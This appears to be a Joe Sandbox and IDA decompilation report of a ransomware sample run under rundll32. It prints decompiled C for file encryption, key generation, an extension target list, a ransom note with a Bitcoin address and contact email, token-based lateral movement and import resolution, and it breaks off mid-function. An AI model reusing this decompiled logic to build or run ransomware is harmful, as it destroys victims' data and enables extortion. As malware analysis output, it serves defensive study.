      • Part of subcall function 011E8CBF: LocalAlloc.KERNEL32(00000000,011E8DFD,?,?,?,?,?,?,?,011E8DFD), ref: 011E8D0E
      • Part of subcall function 011E8CBF: DeviceIoControl.KERNEL32(00000000,00090020,00000000,00000000,00000000,00000000,?,00000000), ref: 011E8D2A
      • Part of subcall function 011E8CBF: WriteFile.KERNEL32(00000000,?,011E8DFD,?,00000000), ref: 011E8D3C
      • Part of subcall function 011E8CBF: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,011E8DFD), ref: 011E8D45
      • Part of subcall function 011E8CBF: CloseHandle.KERNEL32(00000000), ref: 011E8D4C
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E14CB
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E14E8
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1500
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1518
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1530
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1549
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E155C
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1670
      • Part of subcall function 011E14A9: memcpy.MSVCRT ref: 011E16C3
      • Part of subcall function 011E14A9: memcpy.MSVCRT ref: 011E16FC
      • Part of subcall function 011E14A9: memcpy.MSVCRT ref: 011E1762
      • Part of subcall function 011E14A9: memcpy.MSVCRT ref: 011E17F4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E189A, Relevance: 13.6, APIs: 9, Instructions: 84
    C-Code - Quality: 72%
    			E011E189A(long _a4, intOrPtr _a8) {
				long _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v24;
				unsigned int _v28;
				void* _t21;
				unsigned int _t23;
				void* _t25;
				void* _t27;
				long _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t40;

				_t21 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0); // executed
				_t36 = _t21;
				_v16 = _t36;
				if(_t36 != 0xffffffff) {
					__imp__GetFileSizeEx(_t36,  &_v28);
					_v8 = 0;
					_t40 = _v24;
					if(_t40 < 0 || _t40 <= 0 && _v28 <= 0x100000) {
						_t23 = _v28;
						_a4 = _t23;
						_v8 = 1;
						_t35 = (_t23 >> 4) + 1 << 4;
					} else {
						_a4 = 0x100000;
						_t35 = 0x100000;
					}
					_t25 = CreateFileMappingW(_t36, 0, 4, 0, _t35, 0); // executed
					_v12 = _t25;
					if(_t25 != 0) {
						_t27 = MapViewOfFile(_t25, 6, 0, 0, _a4); // executed
						_t37 = _t27;
						if(_t37 != 0) {
							_t30 = _a8;
							_t13 = _t30 + 0x14; // 0xfffffffe
							__imp__CryptEncrypt( *_t13, 0, _v8, 0, _t37,  &_a4, _t35);
							if(_a8 != 0) {
								FlushViewOfFile(_t37, _a4);
							}
							UnmapViewOfFile(_t37);
						}
						CloseHandle(_v12);
					}
					return CloseHandle(_v16);
				}
				return _t21;
			}
















    0x011e18b3
    0x011e18b9
    0x011e18bb
    0x011e18c1
    0x011e18cc
    0x011e18d2
    0x011e18d5
    0x011e18d8
    0x011e1958
    0x011e195b
    0x011e1964
    0x011e196b
    0x011e18e6
    0x011e18e6
    0x011e18e9
    0x011e18e9
    0x011e18f2
    0x011e18f8
    0x011e18fd
    0x011e1907
    0x011e190d
    0x011e1911
    0x011e1918
    0x011e1921
    0x011e1924
    0x011e192c
    0x011e1932
    0x011e1932
    0x011e1939
    0x011e1939
    0x011e1942
    0x011e1942
    0x00000000
    0x011e194b
    0x011e1955

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 011E18B3
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,011E1B25,?,?), ref: 011E18CC
    • CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,?,00000000,?,?,?,?,011E1B25,?), ref: 011E18F2
    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,?,?,?,?,?,011E1B25,?), ref: 011E1907
    • CryptEncrypt.ADVAPI32(FFFFFFFE,00000000,00000001,00000000,00000000,?,?,?,?,?,?,011E1B25,?), ref: 011E1924
    • FlushViewOfFile.KERNEL32(00000000,?,?,?,?,?,011E1B25,?), ref: 011E1932
    • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,011E1B25,?), ref: 011E1939
    • CloseHandle.KERNEL32(?), ref: 011E1942
    • CloseHandle.KERNEL32(011E1B25), ref: 011E194B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1E51, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
    C-Code - Quality: 39%
    			E011E1E51(void* _a4) {
				void* _t9;
				long _t18;
				char* _t22;
				intOrPtr* _t24;
				void* _t25;

				_t24 = __imp__CryptAcquireContextW;
				_t22 = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
				_t9 =  *_t24(_a4 + 8, 0, _t22, 0x18, 0xf0000000); // executed
				if(_t9 != 0) {
					L6:
					_t25 = _a4;
					if(E011E1B4E(_t25) != 0) {
						E011E1973(_t25, 0xf, _t25); // executed
						E011E1D32(_t25); // executed
						CryptDestroyKey( *(_t25 + 0x14));
					}
					CryptReleaseContext( *(_t25 + 8), 0);
				} else {
					_t18 = GetLastError();
					if(_t18 != 0x80090019) {
						if(_t18 != 0x80090016) {
							goto L9;
						} else {
							_push(8);
							_push(0x18);
							_push(_t22);
							goto L5;
						}
					} else {
						_push(0xf0000000);
						_push(0x18);
						_push(0);
						L5:
						_push(0);
						_push(_a4 + 8);
						if( *_t24() == 0) {
							L9:
							_t25 = _a4;
						} else {
							goto L6;
						}
					}
				}
				LocalFree(_t25);
				return 0;
			}








    0x011e1e59
    0x011e1e68
    0x011e1e74
    0x011e1e78
    0x011e1ea9
    0x011e1ea9
    0x011e1eb5
    0x011e1ebb
    0x011e1ec1
    0x011e1ec9
    0x011e1ec9
    0x011e1ed4
    0x011e1e7a
    0x011e1e7a
    0x011e1e85
    0x011e1e93
    0x00000000
    0x011e1e95
    0x011e1e95
    0x011e1e97
    0x011e1e99
    0x00000000
    0x011e1e99
    0x011e1e87
    0x011e1e87
    0x011e1e88
    0x011e1e8a
    0x011e1e9a
    0x011e1e9d
    0x011e1ea2
    0x011e1ea7
    0x011e1edc
    0x011e1edc
    0x00000000
    0x00000000
    0x00000000
    0x011e1ea7
    0x011e1e85
    0x011e1ee0
    0x011e1eec

    APIs
    • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 011E1E74
    • GetLastError.KERNEL32 ref: 011E1E7A
    • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,00000008), ref: 011E1EA3
      • Part of subcall function 011E1B4E: CryptGenKey.ADVAPI32(?,0000660E,00000001,?,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 011E1B66
      • Part of subcall function 011E1B4E: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,F0000000), ref: 011E1B87
      • Part of subcall function 011E1B4E: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 011E1B96
    • LocalFree.KERNEL32(?), ref: 011E1EE0
      • Part of subcall function 011E1973: PathCombineW.SHLWAPI(?,?,011F0A6C), ref: 011E199B
      • Part of subcall function 011E1973: FindFirstFileW.KERNELBASE(?,?), ref: 011E19B6
      • Part of subcall function 011E1973: WaitForSingleObject.KERNEL32(?,00000000), ref: 011E19DC
      • Part of subcall function 011E1973: PathCombineW.SHLWAPI(?,?,?), ref: 011E1A7B
      • Part of subcall function 011E1973: StrStrIW.SHLWAPI(C:\Windows;,?), ref: 011E1AA7
      • Part of subcall function 011E1973: PathFindExtensionW.SHLWAPI(?), ref: 011E1AC7
      • Part of subcall function 011E1973: wsprintfW.USER32 ref: 011E1AF9
      • Part of subcall function 011E1973: StrStrIW.SHLWAPI(.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or,?), ref: 011E1B0F
      • Part of subcall function 011E1973: FindNextFileW.KERNELBASE(?,?), ref: 011E1B2E
      • Part of subcall function 011E1973: FindClose.KERNEL32(?), ref: 011E1B40
      • Part of subcall function 011E1D32: PathCombineW.SHLWAPI(?,?,README.TXT), ref: 011E1D70
      • Part of subcall function 011E1D32: Sleep.KERNELBASE(-00000001), ref: 011E1D8F
      • Part of subcall function 011E1D32: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 011E1DA8
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b,00000432,?,00000000), ref: 011E1DD3
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX,0000004C,?,00000000), ref: 011E1DE2
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,2.Send your Bitcoin wallet ID and personal installation key to e-mail ,0000008E,?,00000000), ref: 011E1DF4
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,wowsmith123456@posteo.net.,00000038,?,00000000), ref: 011E1E03
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,Your personal installation key:,00000048,?,00000000), ref: 011E1E12
      • Part of subcall function 011E1D32: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011E1E35
      • Part of subcall function 011E1D32: CloseHandle.KERNEL32(00000000), ref: 011E1E38
      • Part of subcall function 011E1D32: LocalFree.KERNEL32(?), ref: 011E1E46
    • CryptDestroyKey.ADVAPI32(?,?,?,0000000F,?), ref: 011E1EC9
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 011E1ED4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E85D0, Relevance: 10.6, APIs: 7, Instructions: 62
    C-Code - Quality: 100%
    			E011E85D0(void** __ebx, void* __ecx, struct HRSRC__** _a4, struct HRSRC__* _a8) {
				signed int _v8;
				long _v12;
				void* _t13;
				long _t16;
				void* _t18;
				void* _t19;
				struct HRSRC__** _t22;
				long* _t34;

				_v8 = _v8 & 0x00000000;
				_t13 = LoadResource( *0x11ff120, _a8);
				if(_t13 == 0) {
					L11:
					return _v8;
				}
				_t34 = LockResource(_t13);
				if(_t34 != 0) {
					_t16 = SizeofResource( *0x11ff120, _a8);
					_v12 = _t16;
					if(_t16 != 0) {
						_t18 = HeapAlloc(GetProcessHeap(), 8,  *_t34); // executed
						 *__ebx = _t18;
						if(_t18 != 0) {
							_a8 =  *_t34;
							_t19 = E011EA520(_t18,  &_a8,  &(_t34[1]), _v12 + 0xfffffffc); // executed
							if(_t19 != 0) {
								HeapFree(GetProcessHeap(), 0,  *__ebx);
							} else {
								_t22 = _a4;
								if(_t22 != 0) {
									 *_t22 = _a8;
								}
								_v8 = 1;
							}
						}
					}
				}
				goto L11;
			}











    0x011e85d8
    0x011e85e2
    0x011e85ea
    0x011e8670
    0x011e8674
    0x011e8674
    0x011e85f8
    0x011e85fc
    0x011e8607
    0x011e860d
    0x011e8612
    0x011e8622
    0x011e8628
    0x011e862c
    0x011e8630
    0x011e8643
    0x011e864a
    0x011e8668
    0x011e864c
    0x011e864c
    0x011e8651
    0x011e8656
    0x011e8656
    0x011e8658
    0x011e8658
    0x011e864a
    0x011e866e
    0x011e8612
    0x00000000

    APIs
    • LoadResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85E2
    • LockResource.KERNEL32(00000000,?,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85F2
    • SizeofResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8607
    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E861F
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8622
    • GetProcessHeap.KERNEL32(00000000,?,00000000,002F1C10,-00000004,000000C1,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?), ref: 011E8665
    • HeapFree.KERNEL32(00000000), ref: 011E8668
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E67AF, Relevance: 7.6, APIs: 5, Instructions: 79
    APIs
    • memset.MSVCRT ref: 011E67C7
    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 011E6803
    • recv.WS2_32(00000000,00000000,00000000,00000000), ref: 011E681D
    • htons.WS2_32(?), ref: 011E6832
    • recv.WS2_32(00000000,?,?,00000000), ref: 011E686A
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1424, Relevance: 7.6, APIs: 5, Instructions: 51
    C-Code - Quality: 100%
    			E011E1424(void* __ecx, BYTE* _a4, int _a8) {
				long* _v8;
				int _t10;
				signed int _t12;
				signed int _t14;
				signed int _t16;

				_v8 = 0;
				_t10 = CryptAcquireContextA( &_v8, 0, 0, 1, 0xf0000000); // executed
				if(_t10 != 0) {
					L4:
					if(CryptGenRandom(_v8, _a8, _a4) == 0) {
						_t14 = GetLastError();
						if(_t14 > 0) {
							_t14 = _t14 & 0x0000ffff | 0x80070000;
						}
						 *0x11ff8f8 = _t14;
					}
					L8:
					if(_v8 != 0) {
						CryptReleaseContext(_v8, 0);
					}
					_t12 =  *0x11ff8f8; // 0x0
					return _t12;
				}
				_t16 = GetLastError();
				if(_t16 > 0) {
					_t16 = _t16 & 0x0000ffff | 0x80070000;
				}
				 *0x11ff8f8 = _t16;
				if(_t16 < 0) {
					goto L8;
				} else {
					goto L4;
				}
			}








    0x011e1436
    0x011e143d
    0x011e1455
    0x011e146a
    0x011e147b
    0x011e147d
    0x011e1481
    0x011e1485
    0x011e1485
    0x011e1487
    0x011e1487
    0x011e148c
    0x011e1493
    0x011e149a
    0x011e149a
    0x011e14a0
    0x011e14a6
    0x011e14a6
    0x011e1457
    0x011e145b
    0x011e145f
    0x011e145f
    0x011e1461
    0x011e1468
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,000001FF,?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E143D
    • GetLastError.KERNEL32(?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E1457
    • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E1473
    • GetLastError.KERNEL32(?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E147D
    • CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,0000003C,00000000,?), ref: 011E149A
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E9367, Relevance: 6.1, APIs: 4, Instructions: 109
    C-Code - Quality: 84%
    			E011E9367() {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				void* _t48;
				int _t53;
				struct HINSTANCE__* _t60;
				intOrPtr _t61;
				signed int _t62;
				signed int _t63;
				intOrPtr _t64;
				long _t66;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t73;
				intOrPtr _t75;
				signed int _t77;
				signed int* _t80;
				intOrPtr _t82;
				signed int* _t85;

				_t71 =  *0x11ff120; // 0x11e0000
				_t1 = _t71 + 0x3c; // 0xf0
				_v8 = _v8 & 0x00000000;
				_t48 =  *_t1 + _t71;
				_t70 =  *((intOrPtr*)(_t48 + 0x80)) + _t71;
				if(_t70 != 0) {
					_v12 = _v12 & 0x00000000;
					_t77 =  *(_t48 + 6) & 0x0000ffff;
					_t82 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
					_v16 = _t82;
					if(_t77 > 0) {
						_t66 =  *((intOrPtr*)(_t48 + 0xd8));
						_v20 = _t66;
						do {
							_t75 =  *((intOrPtr*)(_t82 + 0xc));
							if(_t66 < _t75) {
								goto L5;
							} else {
								_v24 =  *(_t82 + 8) + _t75;
								_t66 = _v20;
								if(_t66 >= _v24) {
									goto L5;
								}
							}
							goto L6;
							L5:
							_v12 = _v12 + 1;
							_t82 = _t82 + 0x28;
							_v16 = _t82;
						} while (_v12 < _t77);
					}
					L6:
					_t53 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) + _t71,  *(_t82 + 8), 4,  &_v20); // executed
					if(_t53 != 0) {
						_v8 = 1;
						if( *_t70 == 0) {
							L22:
							_v8 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) +  *0x11ff120,  *(_t82 + 8), _v20,  &_v20);
						} else {
							while(_v8 == 1) {
								_t60 = LoadLibraryA( *((intOrPtr*)(_t70 + 0xc)) +  *0x11ff120); // executed
								_v12 = _t60;
								if(_t60 == 0) {
									_v8 = _v8 & 0x00000000;
								} else {
									_t61 =  *0x11ff120; // 0x11e0000
									_t85 =  *((intOrPtr*)(_t70 + 0x10)) + _t61;
									_t80 =  *_t70 + _t61;
									while(1) {
										_t62 =  *_t80;
										if(_t62 == 0) {
											break;
										}
										if(_v8 == 1) {
											_t73 = _t62 & 0x7fffffff;
											if(_t73 != _t62) {
												_push(_t73);
											} else {
												_t64 =  *0x11ff120; // 0x11e0000
												_t33 = _t73 + 2; // 0x30090
												_push(_t64 + _t33);
											}
											_t63 = GetProcAddress(_v12, ??); // executed
											 *_t85 = _t63;
											if(_t63 == 0) {
												_v8 = _v8 & _t63;
											}
											_t85 =  &(_t85[1]);
											_t80 =  &(_t80[1]);
											continue;
										}
										break;
									}
									_t82 = _v16;
								}
								_t70 = _t70 + 0x14;
								if( *_t70 != 0) {
									continue;
								}
								break;
							}
							if(_v8 != 0) {
								goto L22;
							}
						}
					}
				}
				return _v8;
			}
























    0x011e936d
    0x011e9373
    0x011e9376
    0x011e937a
    0x011e9383
    0x011e9385
    0x011e938f
    0x011e9395
    0x011e9399
    0x011e939d
    0x011e93a2
    0x011e93a4
    0x011e93aa
    0x011e93ad
    0x011e93ad
    0x011e93b2
    0x00000000
    0x011e93b4
    0x011e93b9
    0x011e93bc
    0x011e93c2
    0x00000000
    0x00000000
    0x011e93c2
    0x00000000
    0x011e93c4
    0x011e93c4
    0x011e93c7
    0x011e93ca
    0x011e93cd
    0x011e93ad
    0x011e93d2
    0x011e93e1
    0x011e93e9
    0x011e93f2
    0x011e93f9
    0x011e947a
    0x011e9494
    0x011e93fb
    0x011e93fb
    0x011e940b
    0x011e9411
    0x011e9416
    0x011e949f
    0x011e941c
    0x011e941c
    0x011e9426
    0x011e9428
    0x011e9463
    0x011e9463
    0x011e9467
    0x00000000
    0x00000000
    0x011e9430
    0x011e9434
    0x011e943c
    0x011e944a
    0x011e943e
    0x011e943e
    0x011e9443
    0x011e9447
    0x011e9447
    0x011e944e
    0x011e9454
    0x011e9458
    0x011e945a
    0x011e945a
    0x011e945d
    0x011e9460
    0x00000000
    0x011e9460
    0x00000000
    0x011e9430
    0x011e9469
    0x011e9469
    0x011e946c
    0x011e9472
    0x00000000
    0x00000000
    0x00000000
    0x011e9472
    0x011e9478
    0x00000000
    0x00000000
    0x011e9478
    0x011e93f9
    0x011e9498
    0x011e949e

    APIs
    • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 011E93E1
    • LoadLibraryA.KERNEL32(?), ref: 011E940B
    • GetProcAddress.KERNEL32(00000000,011E0000), ref: 011E944E
    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 011E948E
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011EA073, Relevance: 5.1, APIs: 4, Instructions: 61
    C-Code - Quality: 15%
    			E011EA073(void* __ecx, void _a4) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t10;
				void* _t16;
				void* _t21;
				intOrPtr _t26;
				void* _t30;

				_t21 = _a4;
				if(_t21 != 0) {
					_a4 =  *_t21;
					_t9 =  *0x11ff140; // 0x2e8160
					_t30 =  *(_t21 + 4);
					_v8 = _t9;
					_t10 =  *0x11ff108; // 0x2e6710
					_t26 =  *0x11ff110; // 0x0
					_t34 = _t10;
					if(_t10 == 0) {
						L3:
						_t36 = _t26;
						if(_t26 == 0 || E011E9EC7(_t36, _t30, _t26) == 0) {
							if(_a4 != 0) {
								_t16 = E011E9987(_t30, 0, 0, 0); // executed
								if(_t16 != 0) {
									goto L7;
								}
							}
						} else {
							goto L7;
						}
					} else {
						_push(_t30);
						if(E011E9E05(_t10, _t34) != 0) {
							L7:
							E011E6F91(_t30, _v8, 0);
						} else {
							goto L3;
						}
					}
					HeapFree(GetProcessHeap(), 0, _t30);
					HeapFree(GetProcessHeap(), 0, _t21);
				}
				return 0;
			}










    0x011ea078
    0x011ea07d
    0x011ea081
    0x011ea084
    0x011ea08a
    0x011ea08d
    0x011ea090
    0x011ea096
    0x011ea09c
    0x011ea09e
    0x011ea0aa
    0x011ea0aa
    0x011ea0ac
    0x011ea0be
    0x011ea0c4
    0x011ea0cb
    0x00000000
    0x00000000
    0x011ea0cb
    0x00000000
    0x00000000
    0x00000000
    0x011ea0a0
    0x011ea0a0
    0x011ea0a8
    0x011ea0cd
    0x011ea0d4
    0x00000000
    0x00000000
    0x00000000
    0x011ea0a8
    0x011ea0eb
    0x011ea0f3
    0x011ea0f6
    0x011ea0fb

    APIs
    • HeapFree.KERNEL32(00000000), ref: 011EA0F3
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E99D1
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E9A2A
      • Part of subcall function 011E9987: WNetAddConnection2W.MPR(?,?,?,00000000), ref: 011E9A4C
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E9A6A
      • Part of subcall function 011E9987: PathFindExtensionW.SHLWAPI(?), ref: 011E9A77
      • Part of subcall function 011E9987: PathFileExistsW.SHLWAPI(?), ref: 011E9A8E
      • Part of subcall function 011E9987: GetLastError.KERNEL32 ref: 011E9A98
      • Part of subcall function 011E9987: GetLastError.KERNEL32(?,00000001), ref: 011E9AC3
      • Part of subcall function 011E9987: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9B0C
      • Part of subcall function 011E9987: GetCurrentThread.KERNEL32(00000002,00000001,?,?,00000001), ref: 011E9B54
      • Part of subcall function 011E9987: OpenThreadToken.ADVAPI32(00000000), ref: 011E9B5B
      • Part of subcall function 011E9987: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 011E9B78
      • Part of subcall function 011E9987: memset.MSVCRT ref: 011E9BB1
      • Part of subcall function 011E9987: CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C70
      • Part of subcall function 011E9987: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C78
      • Part of subcall function 011E9987: WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9C8C
      • Part of subcall function 011E9987: GetExitCodeProcess.KERNEL32(?,?), ref: 011E9C9F
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CB5
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CC1
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CCD
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CD9
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CE5
      • Part of subcall function 011E9987: PathFileExistsW.SHLWAPI(?), ref: 011E9D1F
      • Part of subcall function 011E9987: GetLastError.KERNEL32 ref: 011E9D2B
      • Part of subcall function 011E9987: DeleteFileW.KERNEL32(?), ref: 011E9D52
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9D62
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9D76
      • Part of subcall function 011E9987: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9D8F
      • Part of subcall function 011E9987: SetLastError.KERNEL32(00000057,00000000,?,?,?,011EA0C9,?,00000000,00000000,00000000), ref: 011E9DB0
      • Part of subcall function 011E9EC7: CreateThread.KERNEL32(00000000,00000000,011E9EA4,?,00000004,00000000), ref: 011E9F19
      • Part of subcall function 011E9EC7: SetThreadToken.ADVAPI32(?,?), ref: 011E9F2B
      • Part of subcall function 011E9EC7: ResumeThread.KERNEL32(?), ref: 011E9F38
      • Part of subcall function 011E9EC7: WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9F48
      • Part of subcall function 011E9EC7: GetLastError.KERNEL32 ref: 011E9F50
      • Part of subcall function 011E9EC7: CloseHandle.KERNEL32(?), ref: 011E9F59
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011EA0E2
    • HeapFree.KERNEL32(00000000), ref: 011EA0EB
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011EA0F0
      • Part of subcall function 011E9E05: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000003,00000003,?,00000000,?,?), ref: 011E9E8A
      • Part of subcall function 011E9E05: HeapFree.KERNEL32(00000000), ref: 011E9E91
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E3CA0, Relevance: .1, Instructions: 85
    C-Code - Quality: 95%
    			E011E3CA0(void* __eax, signed int __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __esi;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed char* _t37;
				void* _t40;
				void* _t45;
				signed int _t48;
				signed int _t51;
				void* _t59;
				signed int _t61;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t45 = __eax;
				if(__eax == 0) {
					_v8 = 0x84;
				}
				if(_t45 == 1) {
					_v8 = 0xb68;
				}
				if(_t45 == 2) {
					_v8 = 0x480;
				}
				_t33 = E011E1000(_v8);
				_t61 = _t33;
				_v12 = _t61;
